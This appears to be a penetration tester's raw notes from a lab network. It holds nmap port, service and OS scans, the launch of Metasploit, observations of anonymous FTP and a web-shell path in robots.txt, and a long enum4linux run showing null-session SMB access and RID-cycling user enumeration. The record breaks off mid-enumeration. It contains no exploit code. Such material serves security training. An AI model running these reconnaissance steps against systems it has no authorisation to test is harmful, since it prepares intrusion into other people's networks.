nmap 192.168.100.0/24

Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-10 23:07 IST
Nmap scan report for ip-192-168-100-1.ap-south-1.compute.internal (192.168.100.1)
Host is up (0.00015s latency).
All 1000 scanned ports on ip-192-168-100-1.ap-south-1.compute.internal (192.168.100.1) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 02:70:E4:09:D7:C9 (Unknown)

Nmap scan report for ip-192-168-100-50.ap-south-1.compute.internal (192.168.100.50)
Host is up (0.00033s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
MAC Address: 02:49:86:FD:7A:C7 (Unknown)

Nmap scan report for ip-192-168-100-51.ap-south-1.compute.internal (192.168.100.51)
Host is up (0.00035s latency).
Not shown: 989 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49160/tcp open  unknown
MAC Address: 02:8E:B0:B9:0F:EF (Unknown)

Nmap scan report for ip-192-168-100-52.ap-south-1.compute.internal (192.168.100.52)
Host is up (0.00097s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
MAC Address: 02:92:77:8A:57:73 (Unknown)

Nmap scan report for ip-192-168-100-55.ap-south-1.compute.internal (192.168.100.55)
Host is up (0.00035s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 02:3F:BC:10:0C:4B (Unknown)

Nmap scan report for ip-192-168-100-63.ap-south-1.compute.internal (192.168.100.63)
Host is up (0.00030s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
MAC Address: 02:31:37:E1:C1:17 (Unknown)

Nmap scan report for ip-192-168-100-67.ap-south-1.compute.internal (192.168.100.67)
Host is up (0.00040s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 02:73:EE:62:AA:D1 (Unknown)

Nmap scan report for ip-192-168-100-5.ap-south-1.compute.internal (192.168.100.5)
Host is up (0.0000040s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server
5910/tcp open  cm

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

systemctl start postgresql
msfconsole

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

nmap -sV 192.168.100.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-10 23:18 IST
Stats: 0:00:58 elapsed; 248 hosts completed (7 up), 7 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 23:19 (0:00:22 remaining)
Stats: 0:00:59 elapsed; 248 hosts completed (7 up), 7 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 23:19 (0:00:22 remaining)
Nmap scan report for ip-192-168-100-1.ap-south-1.compute.internal (192.168.100.1)
Host is up (0.00018s latency).
All 1000 scanned ports on ip-192-168-100-1.ap-south-1.compute.internal (192.168.100.1) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 02:70:E4:09:D7:C9 (Unknown)

Nmap scan report for ip-192-168-100-50.ap-south-1.compute.internal (192.168.100.50)
Host is up (0.00032s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 02:49:86:FD:7A:C7 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-51.ap-south-1.compute.internal (192.168.100.51)
Host is up (0.00037s latency).
Not shown: 989 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp                Microsoft ftpd
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 02:8E:B0:B9:0F:EF (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-52.ap-south-1.compute.internal (192.168.100.52)
Host is up (0.0062s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp          OpenSMTPD
80/tcp   open  http          Apache httpd 2.4.41
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql         MySQL 5.5.5-10.3.34-MariaDB-0ubuntu0.20.04.1
3389/tcp open  ms-wbt-server xrdp
MAC Address: 02:92:77:8A:57:73 (Unknown)
Service Info: Hosts: 1c5ce6f62bfc, IP-192-168-100-52; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for ip-192-168-100-55.ap-south-1.compute.internal (192.168.100.55)
Host is up (0.00036s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
MAC Address: 02:3F:BC:10:0C:4B (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-63.ap-south-1.compute.internal (192.168.100.63)
Host is up (0.00026s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
MAC Address: 02:31:37:E1:C1:17 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-67.ap-south-1.compute.internal (192.168.100.67)
Host is up (0.00034s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:73:EE:62:AA:D1 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for ip-192-168-100-5.ap-south-1.compute.internal (192.168.100.5)
Host is up (0.0000040s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.7p1 Debian 2 (protocol 2.0)
3389/tcp open  ms-wbt-server xrdp
5910/tcp open  vnc           VNC (protocol 3.8)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (8 hosts up) scanned in 99.95 seconds

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

Searching the wordpress

root@kali:~# nmap -A 192.168.100.50
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-10 23:37 IST
Stats: 0:01:04 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 40.00% done; ETC: 23:39 (0:01:08 remaining)
Nmap scan report for ip-192-168-100-50.ap-south-1.compute.internal (192.168.100.50)
Host is up (0.00044s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
|_http-title: WAMPSERVER Homepage
|_http-server-header: Apache/2.4.51 (Win64) PHP/7.4.26
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows Server 2012 R2 Standard 9600 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: WINSERVER-01
|   NetBIOS_Domain_Name: WINSERVER-01
|   NetBIOS_Computer_Name: WINSERVER-01
|   DNS_Domain_Name: WINSERVER-01
|   DNS_Computer_Name: WINSERVER-01
|   Product_Version: 6.3.9600
|_  System_Time: 2026-02-10T18:09:16+00:00
|_ssl-date: 2026-02-10T18:09:21+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=WINSERVER-01
| Not valid before: 2026-02-09T17:20:48
|_Not valid after:  2026-08-11T17:20:48
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 02:49:86:FD:7A:C7 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/10%OT=80%CT=1%CU=43623%PV=Y%DS=1%DC=D%G=Y%M=024986%T
OS:M=698B7450%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=I%CI=I%II=I
OS:%SS=S%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2301
OS:NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000
OS:%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%D
OS:F=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0
OS:%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=A
OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R
OS:UD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: WINSERVER-01
|   NetBIOS computer name: WINSERVER-01\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-02-10T18:09:16+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WINSERVER-01, NetBIOS user: <unknown>, NetBIOS MAC: 02:49:86:fd:7a:c7 (unknown)
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-02-10T18:09:16
|_  start_date: 2026-02-10T17:20:42

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms ip-192-168-100-50.ap-south-1.compute.internal (192.168.100.50)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.03 seconds

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

Got this in anon login in ftp 192.168.100.52
cat robots.txt.txt 
Disallow: /cmdasp.aspxroot

anyways we found 2 anon login ftp

--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------
--------------------------------------------x--------------------------------------------x--------------------------------------------x---------------------

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 11 01:02:20 2026

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.100.52
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.100.52    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.100.52    |
 ============================================== 
Looking up status of 192.168.100.52
	IP-192-168-100- <00> -         B <ACTIVE>  Workstation Service
	IP-192-168-100- <03> -         B <ACTIVE>  Messenger Service
	IP-192-168-100- <20> -         B <ACTIVE>  File Server Service
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.100.52    |
 ======================================= 
[+] Server 192.168.100.52 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.100.52    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.100.52    |
 ======================================== 
[+] Got OS info for 192.168.100.52 from smbclient: 
[+] Got OS info for 192.168.100.52 from srvinfo:
	IP-192-168-100-Wk Sv PrQ Unx NT SNT ip-192-168-100-52 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 =============================== 
|    Users on 192.168.100.52    |
 =============================== 


 =========================================== 
|    Share Enumeration on 192.168.100.52    |
 =========================================== 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	shared          Disk      shared
	IPC$            IPC       IPC Service (ip-192-168-100-52 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            

[+] Attempting to map shares on 192.168.100.52
//192.168.100.52/print$	Mapping: DENIED, Listing: N/A
//192.168.100.52/shared	Mapping: OK, Listing: OK
//192.168.100.52/IPC$	[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ====================================================== 
|    Password Policy Information for 192.168.100.52    |
 ====================================================== 


[+] Attaching to 192.168.100.52 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] IP-192-168-100-52
	[+] Builtin

[+] Password Info for Domain: IP-192-168-100-52

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ================================ 
|    Groups on 192.168.100.52    |
 ================================ 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================= 
|    Users on 192.168.100.52 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2533145648-3863246947-1352230376
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-2533145648-3863246947-1352230376 and logon username '', password ''
S-1-5-21-2533145648-3863246947-1352230376-500 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-501 IP-192-168-100-52\nobody (Local User)
S-1-5-21-2533145648-3863246947-1352230376-502 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-503 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-504 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-505 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-506 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-507 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-508 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-509 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-510 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-511 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-512 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-513 IP-192-168-100-52\None (Domain Group)
S-1-5-21-2533145648-3863246947-1352230376-514 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-515 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-516 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-517 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-518 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-519 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-520 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-521 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-522 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-523 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-524 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-525 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-526 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-527 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-528 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-529 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-530 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-531 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-532 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-533 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-534 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-535 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-536 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-537 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-538 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-539 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-540 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-541 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-542 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-543 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-544 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-545 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-546 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-547 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-548 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-549 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-550 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1000 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1001 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1002 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1003 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1004 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1005 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1006 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1007 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1008 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1009 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1010 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1011 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1012 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1013 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1014 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1015 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1016 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1017 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1018 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1019 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1020 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1021 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1022 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1023 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1024 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1025 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1026 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1027 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1028 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1029 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1030 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1031 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1032 *unknown*\*unknown* (8)
S-1-5-21-2533145648-3863246947-1352230376-1033 *unknown*\*unknown* (8)
